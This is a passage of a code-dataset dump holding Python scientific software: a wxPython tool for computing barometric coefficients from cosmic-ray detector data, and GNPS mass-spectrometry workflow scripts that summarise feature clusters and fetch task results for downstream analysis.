{2}\".format(self.Data.ifMin, self.Data.ifMax, round(sum(self.Data.intenFixed)/len(self.Data.intenFixed),2)))\n\n        self.m_staticText7.SetLabel(\"P0 = {0} ± {1} мбар\".format(self.Data.P0[0], self.Data.P0[1]))\n        self.m_staticText8.SetLabel(\"I0 = {0} ± {1} {2}\".format(self.Data.I0[0], self.Data.I0[1], self.Data.intenName[1:-1].replace('^{-1}', '\\u207B\\u00B9')))\n        self.m_staticText9.SetLabel(\"B = {0} {1} {2}\".format(self.Data.B, self.Data.intenName[1:-1].replace('^{-1}', '\\u207B\\u00B9'), u\"мбар\\u207B\\u00B9\"))\n        self.m_staticText10.SetLabel(\"β = {0} %/мбар\".format(self.Data.beta))\n\n    def hideGraph( self, event, checkit, figure, axisno):\n        print(checkit.GetValue(), figure.axes[axisno])\n        figure.axes[axisno].set_visible(checkit.GetValue())\n        figure.axes[axisno].xaxis.set_visible(True)\n        #figure.axes[0].xaxis.set_visible(True)\n        #figure.axes[axisno].xticks.set_visible(True)\n        self.canvas1.draw()\n\n    def showGraph1(self, event):\n        if not self.m_mbGraph1.IsChecked():\n            #self.graphPanel1.Hide()\n            self.canvas1.Hide()\n            self.toolbar1.Hide()\n            self.m_panel1.Hide()\n            #self.gSizer1.Layout()\n            #self.canvas2.Fit()\n            #self.toolbar2.Fit()\n            #self.m_panel2.Fit()\n            self.Refresh()\n\n        else:\n            #self.graphPanel1.Show()\n            self.canvas1.Show()\n            self.toolbar1.Show()\n            self.m_panel1.Show()\n            self.Refresh()\n\n    def showGraph2(self, event):\n        if not self.m_mbGraph2.IsChecked():\n            #self.graphPanel1.Hide()\n
            self.canvas2.Hide()\n            self.toolbar2.Hide()\n            self.m_panel2.Hide()\n            self.Refresh()\n\n        else:\n            #self.graphPanel1.Show()\n            self.canvas2.Show()\n            self.toolbar2.Show()\n            self.m_panel2.Show()\n            self.Refresh()\n\n    def exitApp(self, event):\n        self.Close()\n\n    def __del__( self ):\n        pass\n\n\n\n\nclass DetectorApp(wx.App):\n\n    def OnInit(self):\n\n        frame = EventHandler()\n        frame.Show(True)\n        frame.Maximize(True)\n\n        return True\n" }, { "alpha_fraction": 0.5029423236846924, "alphanum_fraction": 0.5237348079681396, "avg_line_length": 28.964706420898438, "blob_id": "5069eb48dff8f3c30d70493a8d8432860e5cdd1d", "content_id": "77c3d6558a6e1b35f4ad9aad154c29d3cfea5898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2612, "license_type": "no_license", "max_line_length": 112, "num_lines": 85, "path": "/detectorData.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "import dateutil.parser\nfrom matplotlib import dates\nimport datetime as dt\nimport numpy as np\n\nclass DetectorData:\n    \"\"\"Класс обеспечивающий парсинг и хранение данных из файлов детекторов\"\"\"\n\n    datTim = []\n    press = []\n    inten = []\n    intenFixed = []\n    fit = []\n    A = 0\n    B = 0\n    iMax, iMin = 0, 0\n    pMax, pMin = 0, 0\n    ifMax, ifMin = 0, 0\n    intenName = \" \"\n    p = None\n\n    P0=[]\n    I0=[]\n    beta=0\n\n    def parseFile(self, fileName):\n        if \"URG\" in fileName:\n            self.intenName = \"$ с^{-1}$\"\n            i = 2\n            p = 1\n        else:\n            self.intenName = \"$ мин^{-1}$\"\n            i = 1\n            p = 2\n        with open(fileName) as data:\n            next(data)\n            for line in data:\n                line = line.strip().split(\"\\t\")\n                self.datTim.append(line[0])\n                self.press.append(float(line[p]))\n                self.inten.append(float(line[i]))\n        data.close()\n        self.datTim = [dateutil.parser.datetime.datetime.strptime(s, '%d.%m.%Y %H:%M') for s in self.datTim]\n        self.datTim = dates.date2num(self.datTim)\n\n        self.pMax, self.pMin = round(max(self.press),2), round(min(self.press),2)\n        self.iMax, self.iMin = round(max(self.inten),2), round(min(self.inten),2)\n        self.P0 = [round(np.mean(self.press), 2), round(np.std(self.press),2)]\n        print(self.P0[0], self.P0[1])\n        self.I0 = [round(np.mean(self.inten), 2), round(np.std(self.inten), 2)]\n\n\n\n        return 1\n\n    def intenFix(self):\n        n = len(self.inten)\n\n        self.B = round((n*sum(self.press[i]*self.inten[i] for i in range(0, n)) -\n                sum(self.inten)*sum(self.press))/(n*sum(p*p for p in self.press) - pow(sum(self.press), 2)), 2)\n\n        self.A = round((sum(self.inten) - self.B * sum(self.press)) / n, 2)\n\n        z = np.polyfit(self.press, self.inten, 1)\n        self.p = np.poly1d(z)\n\n        print (\"y = {0} + {1}x\".format(self.A, self.B))\n\n\n        pavg = sum(self.press)/float(len(self.press))\n        self.intenFixed = [self.inten[i] + self.B*(pavg - self.press[i]) for i in range(0, n)]\n        self.ifMax, self.ifMin = round(max(self.intenFixed),2), round(min(self.intenFixed),2)\n        self.beta = round(self.B/self.I0[0]*100, 2)\n\n    def __init__(self, fileName):\n        self.datTim = []\n        self.press = []\n        self.inten = []\n        self.intenFixed = []\n        self.fit = []\n        self.P0 =[]\n        self.I0 = []\n\n        self.parseFile(fileName)\n        self.intenFix()\n\n\n" }, { "alpha_fraction": 0.7935943007469177, "alphanum_fraction": 0.7971529960632324, "avg_line_length": 39.14285659790039, "blob_id": "66b9551221e5c4d3f2309d50a80b802b715dc443", "content_id": "8876e22eb7092affef9d647bddaca3941328c536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 940, "license_type": "no_license", "max_line_length": 191, "num_lines": 
14, "path": "/readme.md", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# Uragan\n\nПрограмма расчета барометрических коэффициентов для мюонного годоскопа УРАГАН (МГ) и Московского нейтронного монитора (МНМ, ИЗМИРАН).\n\nСоздана для выполнения лабораторной работы \"Исследование барометрического эффекта в потоке мюонов и нейтронов\", описание работы находится в файле [ЛаптевАП_Отчет.docx](./ЛаптевАП_Отчет.docx).\n\nДанные с мюонного годоскопа УРАГАН (МГ) и Московского нейтронного монитора (МНМ, ИЗМИРАН) находятся в папке [testData](./testData/)\n\nИспользованные технологии:\n* Python 3.7\n* matplotlib\n* wxWidgets\n\n![uragan](./uragan.jpg)\n" }, { "alpha_fraction": 0.5958926677703857, "alphanum_fraction": 0.6303411722183228, "avg_line_length": 37.94193649291992, "blob_id": "0cccd0352a44110fd6e777418845e759a859a4fd", "content_id": "d5e643d31ba9fe3b7c484cf1875445c4b11585e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6178, "license_type": "no_license", "max_line_length": 211, "num_lines": 155, "path": "/lab1/source/detectorForm.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n## Python code generated with wxFormBuilder (version Jun 17 2015)\n\nimport wx\nimport wx.xrc\n##\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\nFigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\n\n\nclass MainFrame ( wx.Frame ):\n\n def initForm( self, parent ):\n wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u\"Обработка данных детектора\", pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.DEFAULT_FRAME_STYLE|wx.MAXIMIZE|wx.TAB_TRAVERSAL )\n\n self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )\n\n gSizer1 = wx.GridSizer( 0, 2, 0, 1 )\n\n bSizer2 = wx.BoxSizer( wx.VERTICAL )\n\n self.m_panel1 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel1.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_MENU ) )\n\n gSizer4 = wx.GridSizer( 2, 3, 0, 0 )\n\n self.m_checkBox1 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Темп счета нейтронов (без учета БЭ)\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox1.SetValue(True)\n gSizer4.Add( self.m_checkBox1, 0, wx.ALL, 1 )\n\n self.m_checkBox2 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Давление\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox2.SetValue(True)\n gSizer4.Add( self.m_checkBox2, 0, wx.ALL, 1 )\n\n self.m_checkBox3 = wx.CheckBox( self.m_panel1, wx.ID_ANY, u\"Темп счета нейтронов(с учетом БЭ)\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_checkBox3.SetValue(True)\n gSizer4.Add( self.m_checkBox3, 0, wx.ALL, 1 )\n\n\n self.m_staticText4 = wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText4.Wrap( -1 )\n gSizer4.Add( self.m_staticText4, 0, wx.ALL, 3 )\n\n self.m_staticText5 = wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText5.Wrap( -1 )\n gSizer4.Add( self.m_staticText5, 0, wx.ALL, 3 )\n\n self.m_staticText6 = wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText6.Wrap( -1 )\n gSizer4.Add( self.m_staticText6, 0, wx.ALL, 3 )\n\n\n\n self.m_panel1.SetSizer( gSizer4 )\n self.m_panel1.Layout()\n gSizer4.Fit( self.m_panel1 )\n 
self.m_panel1.Layout()\n bSizer2.Add( self.m_panel1, 0.88, wx.EXPAND, 5 )\n\n\n gSizer1.Add( bSizer2, 1, wx.EXPAND, 5 )\n\n bSizer3 = wx.BoxSizer( wx.VERTICAL )\n bSizer31 = wx.BoxSizer( wx.VERTICAL )\n self.m_panel2 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel2.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_MENU ) )\n\t\t\n self.m_staticText7 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"P0 = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText7.Wrap( -1 )\n bSizer31.Add( self.m_staticText7, 0, wx.ALL, 5 )\n\n self.m_staticText8 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"I0 = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText8.Wrap( -1 )\n bSizer31.Add( self.m_staticText8, 0, wx.ALL, 5 )\n\n self.m_staticText9 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"B = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText9.Wrap( -1 )\n bSizer31.Add( self.m_staticText9, 0, wx.ALL, 5 )\n\n self.m_staticText10 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"β = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText10.Wrap( -1 )\n bSizer31.Add( self.m_staticText10, 0, wx.ALL, 5 )\n\n\n self.m_panel2.SetSizer( bSizer31 )\n self.m_panel2.Layout()\n bSizer31.Fit( self.m_panel2 )\n bSizer3.Add( self.m_panel2, 0.9, wx.EXPAND, 5 )\n\n\n gSizer1.Add( bSizer3, 1, wx.EXPAND, 5 )\n\n\n self.SetSizer( gSizer1 )\n self.Layout()\n self.m_menubar1 = wx.MenuBar( 0 )\n self.m_fileMenu = wx.Menu()\n self.m_mbopenFile = wx.MenuItem( self.m_fileMenu, wx.ID_ANY, u\"Открыть\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_fileMenu.AppendItem( self.m_mbopenFile )\n\n self.m_fileMenu.AppendSeparator()\n\n self.m_mbexit = wx.MenuItem( self.m_fileMenu, wx.ID_ANY, u\"Выход\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_fileMenu.AppendItem( self.m_mbexit )\n\n self.m_menubar1.Append( self.m_fileMenu, u\"Файл\" )\n\n #self.m_menu3 = wx.Menu()\n #self.m_mbGraph1 = wx.MenuItem( self.m_menu3, wx.ID_ANY, u\"Данные 1\", wx.EmptyString, wx.ITEM_CHECK )\n #self.m_menu3.AppendItem( self.m_mbGraph1 )\n #self.m_mbGraph1.Check( True )\n\n #self.m_mbGraph2 = wx.MenuItem( self.m_menu3, wx.ID_ANY, u\"Данные 2\", wx.EmptyString, wx.ITEM_CHECK )\n #self.m_menu3.AppendItem( self.m_mbGraph2 )\n #self.m_mbGraph2.Check( True )\n\n #self.m_menubar1.Append( self.m_menu3, u\"Скрыть\" )\n\n self.SetMenuBar( self.m_menubar1 )\n\n\n\n #заготовки для графикa 1\n self.figure1 = Figure()\n\n self.canvas1 = FigureCanvas(self, wx.ID_ANY, self.figure1)\n bSizer2.Add(self.canvas1, 3, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar1 = NavigationToolbar2Wx(self.canvas1)\n self.toolbar1.Realize()\n bSizer2.Add(self.toolbar1, 0, wx.LEFT | wx.EXPAND)\n #self.Fit()\n #####\n\n #2\n self.figure2 = Figure()\n self.canvas2 = FigureCanvas(self, wx.ID_ANY, self.figure2)\n bSizer3.Add(self.canvas2, 3, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar2 = NavigationToolbar2Wx(self.canvas2)\n self.toolbar2.Realize()\n bSizer3.Add(self.toolbar2, 0, wx.LEFT | wx.EXPAND)\n\n #self.Fit()\n ##\n self.SetAutoLayout(True)\n self.Centre( wx.BOTH )\n self.SetIcon(wx.Icon('icon.ico', wx.BITMAP_TYPE_ICO))\n\n self.Refresh()\n\n\n def __del__( self ):\n pass\n\n\n" }, { "alpha_fraction": 0.6532846689224243, "alphanum_fraction": 0.6624087691307068, "avg_line_length": 44.75, "blob_id": "0fa4597242b72c92728ee4ae52bcbc416cbee639", "content_id": "938fcc06b8d26b65a214278adc4c07f7499f6ef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
548, "license_type": "no_license", "max_line_length": 102, "num_lines": 12, "path": "/exe.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "from cx_Freeze import setup, Executable\nincludefiles = ['icon.ico']\nincludes = ['numpy.core.fromnumeric._methods', 'numpy.lib.format']\npackages = ['dateutil', 'matplotlib', 'datetime', 'numpy', 'wx', 'wx.xrc' 'functools',\n 'detectorApp', 'detectorForm', 'detectorData' ]\nsetup(\n name = 'DetectorInfo',\n version = '1.0',\n description = \"Lab1 script\",\n options = {'build.exe': {'packages':packages, 'include_files':includefiles, 'includes':includes}},\n executables = [Executable('main.py', base = \"Win32GUI\", icon=\"icon.ico\")]\n )" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 24.33333396911621, "blob_id": "56663f1b3b06b4990ce148e355ff3d50f3059e41", "content_id": "24aa8f853b46dea076e65b10f855fda73486eadf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 37, "num_lines": 3, "path": "/fbp/test.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "from detectorData import DetectorData\n\ndd = DetectorData(\"MNM_2017_08.dat\")\n\n\n\n\n\n\n" } ]
8
madeleineernst/GNPS_Workflows
https://github.com/madeleineernst/GNPS_Workflows
aa40e76081bf98334443971f6b68358f9090a2b2
a7b2b841ead898552fdb6a24879c6c28a64b7a50
66c20aaeb41c0e49c35e5c1cd6d9d7eabd850b5d
refs/heads/master
2020-08-29T15:08:31.516933
2019-10-26T23:00:07
2019-10-26T23:00:07
218,069,981
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8218390941619873, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 27.83333396911621, "blob_id": "8dcc6491b4788ed1480a4b4377eb490fe04fddb6", "content_id": "63fa8631888d012253d8686fdd6704ec98f79359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 174, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/search_single_spectrum/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=search_single_spectrum\nTOOL_FOLDER_NAME=search_single_spectrum\nWORKFLOW_VERSION=release_13\n\n" }, { "alpha_fraction": 0.6403359770774841, "alphanum_fraction": 0.6455265879631042, "avg_line_length": 40.22957229614258, "blob_id": "00edba20f9bc7cc7de07869ade4bc7e58bc3fd49", "content_id": "fcbcbc1c16818c15827879da8af2618f5100f7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10596, "license_type": "no_license", "max_line_length": 292, "num_lines": 257, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/clusterinfosummary_for_featurenetworks.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\nimport sys\nimport getopt\nimport os\nimport json\nimport argparse\nimport statistics\nimport glob\nimport ming_spectrum_library\nimport ming_proteosafe_library\nfrom collections import defaultdict\nimport glob\nimport pandas as pd\n\ndef determine_input_files(header_list):\n filenames = []\n filename_headers = []\n for header in header_list:\n #if header.find(\"mzXML\") != -1 or header.find(\"mzML\") != -1:\n if \"Peak area\" in header:\n filenames.append(header.replace(\"Peak area\", \"\").replace(\"filtered\", \"\").rstrip())\n filename_headers.append(header.rstrip(\"\\n\"))\n\n #If the set of filenames is empty, then we will fall back and use elimination\n blacklisted_headers = [\"row ID\", \"row m/z\", \"row retention time\"]\n if len(filenames) == 0:\n for header in header_list:\n if len(header) < 2:\n continue\n if header in blacklisted_headers:\n continue\n filenames.append(header.replace(\"Peak area\", \"\").replace(\"filtered\", \"\").rstrip())\n filename_headers.append(header)\n\n print(filename_headers, filenames)\n\n return filenames, filename_headers\n\ndef load_group_attribute_mappings(metadata_filename):\n filename_header = \"filename\"\n\n attributes_to_groups_mapping = defaultdict(set)\n group_to_files_mapping = defaultdict(list)\n \n metadata_df = pd.read_csv(metadata_filename, sep=\"\\t\")\n print(metadata_df.head())\n record_list = metadata_df.to_dict(orient=\"records\")\n for record in record_list:\n for header in record:\n if \"ATTRIBUTE_\" in header:\n filename = record[filename_header].rstrip().replace('\\n', '').replace('\\r', '')\n group_name = str(record[header]).rstrip().replace('\\n', '').replace('\\r', '')\n attribute = header.rstrip().replace('\\n', '').replace('\\r', '')\n if len(filename) > 2:\n group_to_files_mapping[group_name].append(filename)\n attributes_to_groups_mapping[attribute].add(group_name)\n\n return group_to_files_mapping, attributes_to_groups_mapping\n\ndef determine_group_abundances(group_to_file_mapping, per_file_abundances, operation=\"Mean\"):\n group_abundances_intermediate = defaultdict(list)\n group_abundances = defaultdict(lambda: 0.0)\n\n file_to_group_mapping = 
defaultdict(list)\n for group_name in group_to_file_mapping:\n for filename in group_to_file_mapping[group_name]:\n file_to_group_mapping[filename].append(group_name)\n\n for file_abundance in per_file_abundances:\n filename = file_abundance[0].replace(\"filtered\", \"\").replace(\"Peak area\", \"\").rstrip()\n intensity = file_abundance[1]\n for group in file_to_group_mapping[filename]:\n group_abundances_intermediate[group].append(intensity)\n\n\n for group in group_abundances_intermediate:\n if operation == \"Sum\":\n group_abundances[group] = sum(group_abundances_intermediate[group])\n if operation == \"Mean\":\n if len(group_abundances_intermediate[group]) == 0:\n group_abundances[group] = 0.0\n else:\n group_abundances[group] = statistics.mean(group_abundances_intermediate[group])\n\n return group_abundances\n\n###Reading from Robin's output tool\ndef enrich_adduct_annotations(cluster_object, quant_table_object):\n if \"correlation group ID\" in quant_table_object:\n cluster_object[\"Correlated Features Group ID\"] = quant_table_object[\"correlation group ID\"]\n\n if \"annotation network number\" in quant_table_object:\n cluster_object[\"Annotated Adduct Features ID\"] = quant_table_object[\"annotation network number\"]\n\n if \"best ion\" in quant_table_object:\n cluster_object[\"Best Ion\"] = quant_table_object[\"best ion\"]\n\n if \"neutral M mass\" in quant_table_object:\n cluster_object[\"neutral M mass\"] = quant_table_object[\"neutral M mass\"]\n\n if \"auto MS2 verify\" in quant_table_object:\n cluster_object[\"MS2 Verification Comment\"] = quant_table_object[\"auto MS2 verify\"]\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Creating Clustering Info Summary')\n parser.add_argument('params_xml', help='params_xml')\n parser.add_argument('consensus_feature_file', help='Consensus Quantification File')\n parser.add_argument('metadata_folder', help='metadata metadata_folder')\n parser.add_argument('mgf_filename', help='mgf_filename')\n parser.add_argument('output_clusterinfo_summary', help='output file')\n args = parser.parse_args()\n\n param_obj = ming_proteosafe_library.parse_xml_file(open(args.params_xml))\n\n task_id = param_obj[\"task\"][0]\n\n group_to_files_mapping = defaultdict(list)\n attributes_to_groups_mapping = defaultdict(set)\n\n metadata_files = glob.glob(os.path.join(args.metadata_folder, \"*\"))\n if len(metadata_files) == 1:\n group_to_files_mapping, attributes_to_groups_mapping = load_group_attribute_mappings(metadata_files[0])\n\n ROW_NORMALIZATION = \"None\"\n try:\n ROW_NORMALIZATION = param_obj[\"QUANT_FILE_NORM\"][0]\n except:\n ROW_NORMALIZATION = \"None\"\n\n GROUP_COUNT_AGGREGATE_METHOD = \"Sum\"\n try:\n GROUP_COUNT_AGGREGATE_METHOD = param_obj[\"GROUP_COUNT_AGGREGATE_METHOD\"][0]\n except:\n GROUP_COUNT_AGGREGATE_METHOD = \"None\"\n\n\n quantification_df = pd.read_csv(args.consensus_feature_file)\n quantification_list = quantification_df.to_dict(orient=\"records\")\n\n input_filenames, input_filename_headers = determine_input_files(quantification_list[0].keys())\n\n ### Filling in Quantification table if it is missing values\n for quantification_object in quantification_list:\n ###Handling empty quantification\n for filename in input_filename_headers:\n try:\n if len(quantification_object[filename]) == 0:\n #print(filename, quantification_object[filename], quantification_object[\"row ID\"])\n quantification_object[filename] = 0\n except:\n x = 1\n\n print(\"Number of Features\", len(quantification_list))\n\n #Doing row sum 
normalization\n if ROW_NORMALIZATION == \"RowSum\":\n print(\"ROW SUM NORM\")\n for filename_header in input_filename_headers:\n file_quants = [float(quantification_object[filename_header]) for quantification_object in quantification_list]\n summed_file_quants = sum(file_quants)\n #Handling zero column\n if summed_file_quants > 0:\n for quantification_object in quantification_list:\n quantification_object[filename_header] = float(quantification_object[filename_header]) / sum(file_quants) * 1000000\n\n \"\"\"Loading MS2 Spectra\"\"\"\n mgf_collection = ming_spectrum_library.SpectrumCollection(args.mgf_filename)\n mgf_collection.load_from_file()\n\n clusters_list = []\n for quantification_object in quantification_list:\n\n cluster_obj = {}\n cluster_obj[\"cluster index\"] = quantification_object[\"row ID\"]\n cluster_obj[\"precursor mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]))\n cluster_obj[\"RTConsensus\"] = \"{0:.4f}\".format(float(quantification_object[\"row retention time\"]))\n\n all_charges = []\n\n \"\"\"Checking about the charge of this cluster\"\"\"\n try:\n spectrum_object = mgf_collection.scandict[int(cluster_obj[\"cluster index\"])]\n charge = int(spectrum_object.charge)\n except:\n charge = 0\n\n \"\"\"Checking if this spectrum has no peaks\"\"\"\n # try:\n # spectrum_object = mgf_collection.scandict[int(cluster_obj[\"cluster index\"])]\n #\n # except:\n # continue\n\n all_files = [os.path.basename(filename) for filename in input_filename_headers if float(quantification_object[filename]) > 0]\n abundance_per_file = [(os.path.basename(filename), float(quantification_object[filename])) for filename in input_filename_headers]\n all_abundances = [float(quantification_object[filename]) for filename in input_filename_headers]\n\n if charge != 0:\n cluster_obj[\"parent mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]) * charge - charge + 1)\n else:\n cluster_obj[\"parent mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]))\n cluster_obj[\"precursor charge\"] = charge\n\n try:\n cluster_obj[\"RTMean\"] = statistics.mean(all_retention_times)\n cluster_obj[\"RTStdErr\"] = statistics.stdev(all_retention_times)\n except:\n cluster_obj[\"RTMean\"] = cluster_obj[\"RTConsensus\"]\n cluster_obj[\"RTStdErr\"] = 0\n\n cluster_obj[\"GNPSLinkout_Cluster\"] = 'https://gnps.ucsd.edu/ProteoSAFe/result.jsp?task=%s&view=view_all_clusters_withID&show=true#{\"main.cluster index_lowerinput\":\"%s\",\"main.cluster index_upperinput\":\"%s\"}' % (task_id, quantification_object[\"row ID\"], quantification_object[\"row ID\"])\n cluster_obj[\"sum(precursor intensity)\"] = sum(all_abundances)\n cluster_obj[\"SumPeakIntensity\"] = sum(all_abundances)\n cluster_obj[\"number of spectra\"] = len(all_files)\n cluster_obj[\"UniqueFileSourcesCount\"] = len(all_files)\n\n group_abundances = determine_group_abundances(group_to_files_mapping, abundance_per_file, operation=GROUP_COUNT_AGGREGATE_METHOD)\n\n default_groups = [\"G1\", \"G2\", \"G3\", \"G4\", \"G5\", \"G6\"]\n for group in group_to_files_mapping:\n group_header = \"GNPSGROUP:\" + group\n if group in default_groups:\n continue\n cluster_obj[group_header] = group_abundances[group]\n\n for group in default_groups:\n cluster_obj[group] = group_abundances[group]\n\n #Writing attributes\n for attribute in attributes_to_groups_mapping:\n groups_to_include = []\n for group in attributes_to_groups_mapping[attribute]:\n if group_abundances[group] > 0.0:\n groups_to_include.append(group)\n if 
len(groups_to_include) == 0:\n cluster_obj[attribute] = \"\"\n else:\n cluster_obj[attribute] = \",\".join(groups_to_include)\n\n\n \"\"\"\n Enriching the cluster info with adduct collapsing information\n \"\"\"\n enrich_adduct_annotations(cluster_obj, quantification_object)\n\n\n clusters_list.append(cluster_obj)\n\n pd.DataFrame(clusters_list).to_csv(args.output_clusterinfo_summary, sep=\"\\t\", index=False)\n\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6543371677398682, "alphanum_fraction": 0.6590834856033325, "avg_line_length": 45.25757598876953, "blob_id": "d41ca60861141412a3650fd483df2af5366d627d", "content_id": "46dff26624e859c5e9cc8332942b16735e848b97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6110, "license_type": "no_license", "max_line_length": 156, "num_lines": 132, "path": "/molnetenhancer/tools/molnetenhancer/metabodisttree.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport requests\nimport shutil\nimport pandas as pd\nimport proteosafe\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('GNPS', help='enter your GNPS job ID')\nparser.add_argument('molnetenhancer_input_folder', help='molnetenhancer_input')\nparser.add_argument('output_folder', help='output_folder')\nargs = parser.parse_args()\n\ntask_id = args.GNPS\n\nSERVER_BASE = \"http://dorresteinappshub.ucsd.edu:5024\"\ntask_information = proteosafe.get_task_information(\"gnps.ucsd.edu\", task_id)\nprint(task_information)\n\nclassyfire_result_filename = os.path.join(args.molnetenhancer_input_folder, \"ClassyFireResults_Network.txt\")\n\nif task_information[\"workflow\"] == \"METABOLOMICS-SNETS-V2\":\n\n try:\n manifest_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_manifest.tsv\".format(task_id)\n metadata_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_metadata.tsv\".format(task_id)\n quantification_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=cluster_buckets/\".format(task_id)\n\n manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n metadata_filename = os.path.join(args.output_folder, \"qiime2_metadata.tsv\")\n quantification_filename = os.path.join(args.output_folder, \"quantification.tsv\")\n \n #Pull down the qiime2 data\n with open(manifest_filename, 'wb') as f:\n f.write(requests.get(manifest_url).content)\n\n with open(metadata_filename, 'wb') as f:\n f.write(requests.get(metadata_url).content)\n\n with open(quantification_filename, 'wb') as f:\n f.write(requests.get(quantification_url).content)\n\n metabodist_endpoint = SERVER_BASE + \"/processmetabodisttree\"\n\n files = {'manifest': open(manifest_filename, 'r'), \\\n 'metadata': open(metadata_filename, 'r'), \\\n 'quantification': open(quantification_filename, 'r'), \\\n 'classyfireresult': open(classyfire_result_filename, 'r')}\n\n r_post = requests.post(metabodist_endpoint, files=files, data={\"type\":\"classical\"})\n response_dict = r_post.json()\n \n with open(os.path.join(args.output_folder, \"metabodistree_table.qza\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"table_qza\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n with open(os.path.join(args.output_folder, \"metabodistree_emperor.qzv\"), 'wb') as f:\n r = requests.get(SERVER_BASE + 
response_dict[\"emperor_qzv\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n except KeyboardInterrupt:\n raise\n except:\n print(\"Error\")\n exit(0)\n\nif task_information[\"workflow\"] == \"FEATURE-BASED-MOLECULAR-NETWORKING\":\n #Workflow versions will eventually be supported\n # task_information[\"workflow_version\"] not in [\"1.2.3\", \"1.2.5\", \"release_8\"]\n\n try:\n manifest_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_manifest.tsv\".format(task_id)\n metadata_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_metadata.tsv\".format(task_id)\n quantification_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=quantification_table_reformatted/\".format(task_id)\n\n manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n metadata_filename = os.path.join(args.output_folder, 